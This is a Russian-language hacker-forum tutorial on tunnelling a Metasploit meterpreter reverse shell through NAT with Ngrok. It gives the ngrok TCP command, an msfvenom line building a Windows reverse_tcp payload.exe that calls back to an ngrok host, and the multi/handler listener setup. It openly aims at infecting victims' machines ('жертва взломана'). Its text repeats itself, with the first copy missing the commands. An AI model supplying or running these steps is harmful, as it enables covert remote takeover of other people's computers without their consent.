Привет хацкер, сегодня мы рассмотрим возможность устанавливать TCP соединение обходя NAT.
Нам понадобятся: Metasploit, Ngrok.
Приступим!
Для начала нам понадобится Ngrok, для того, чтобы его установить, переходим на официальный сайт проекта.
Здесь нам необходимо выполнить простую процедуру регистрации:
Теперь перейдём к установке, исходя из вашей битности кали, выбираем именно нужную версию:
Скачиваем, распаковываем, вводим токен, профит!11! (Все подробные моменты установки есть выше на картинке)
Теперь нам нужно поднять tcp соединение, делаем это командой в терминале:
Где 4444 - номер порта, tcp - тип соединения.
Обязательно дождись статуса online!
В этом окне нам понадобится лишь это:
У вас будет другой порт.
Это значит, что все запросы, которые отправляются на 0.tcp.ngrok.io через порт 12529 (в моём случае), будет перенаправлен на вашу тачку с портом который мы указали при запуске ngrok (4444). Терминал не закрываем, двигаемся дальше.
Открываем новый терминал сочетанием клавиш Shift + Ctrl + N
Здесь нам нужно создать пейлоад.
Пейлоад готов! Осталось его запустить на другой машине, и сессия метерпретер у вас в кармане, но перед этим, нам нужно запустить "слушатель", который будет прослушивать порт 4444 для соединений.
Делаем мы это командами в терминале:
Теперь, когда слушатель запущен, все TCP соединения перенаправляются нам на машину. Если пользователь запустит наш пейлоад, мы получаем активную сессию meterpreter:
Вот и всё, жертва взломана, мы довольны.
Это одно из многочисленных способов использования Ngrok, для заражения машин.
Нам понадобятся: Metasploit, Ngrok.
Приступим!
Для начала нам понадобится Ngrok, для того, чтобы его установить, переходим на официальный сайт проекта.
Здесь нам необходимо выполнить простую процедуру регистрации:
Теперь перейдём к установке, исходя из вашей битности кали, выбираем именно нужную версию:
Скачиваем, распаковываем, вводим токен, профит!11! (Все подробные моменты установки есть выше на картинке)
Теперь нам нужно поднять tcp соединение, делаем это командой в терминале:
./ngrok tcp 4444
Где 4444 - номер порта, tcp - тип соединения.
Обязательно дождись статуса online!
В этом окне нам понадобится лишь это:
tcp://0.tcp.ngrok.io:12529
У вас будет другой порт.
Это значит, что все запросы, которые отправляются на 0.tcp.ngrok.io через порт 12529 (в моём случае), будет перенаправлен на вашу тачку с портом который мы указали при запуске ngrok (4444). Терминал не закрываем, двигаемся дальше.
Открываем новый терминал сочетанием клавиш Shift + Ctrl + N
Здесь нам нужно создать пейлоад.
msfvenom -p windows /meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=ВАШПОРТ -f exe> payload.exe
Пейлоад готов! Осталось его запустить на другой машине, и сессия метерпретер у вас в кармане, но перед этим, нам нужно запустить "слушатель", который будет прослушивать порт 4444 для соединений.
Делаем мы это командами в терминале:
Форматирование (BB-код):
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploitТеперь, когда слушатель запущен, все TCP соединения перенаправляются нам на машину. Если пользователь запустит наш пейлоад, мы получаем активную сессию meterpreter:
Вот и всё, жертва взломана, мы довольны.
Это одно из многочисленных способов использования Ngrok, для заражения машин.
